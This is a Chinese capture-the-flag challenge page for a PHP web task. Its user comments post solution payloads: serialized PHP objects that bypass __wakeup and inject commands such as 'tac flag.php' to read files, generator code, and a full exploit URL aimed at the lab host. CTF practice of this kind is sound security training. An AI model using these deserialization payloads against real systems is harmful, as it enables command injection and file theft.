安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2358
提  示:
描  述:
flag{}
评论
tfios 1年前

环境变量里边也有 FLAG

回复 0

LLTVLL 1年前

AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。

回复 0

Bojing 1年前

有哪里提示了username是admin的吗

回复 0
numberone 1年前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 1

18956160518 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 2年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 2年前

nl flag.php|base64

回复 0

不会编程的崽 2年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 2年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 2年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

WriteUp

image
小赵同学

3 金币

评分(4)

解题动态

17586557508 攻破了该题 2天前
lanza2451150 攻破了该题 3天前
ccllll 攻破了该题 5天前
w111 攻破了该题 5天前
H8Y8H 攻破了该题 5天前
1348931180 攻破了该题 5天前
Newdap 攻破了该题 12天前
Wu. 攻破了该题 13天前
YYYYY123 攻破了该题 17天前
liqs 攻破了该题 18天前
风起 攻破了该题 18天前
WYYYYTT 攻破了该题 19天前
yyt030 攻破了该题 22天前
Mori. 攻破了该题 29天前
乱来小木 攻破了该题 1月前
hdcc1 攻破了该题 1月前
qq1002517 攻破了该题 1月前
flag大王 攻破了该题 1月前
xiaoxiaojiangshi 攻破了该题 1月前
shuiniu221 攻破了该题 1月前
问题反馈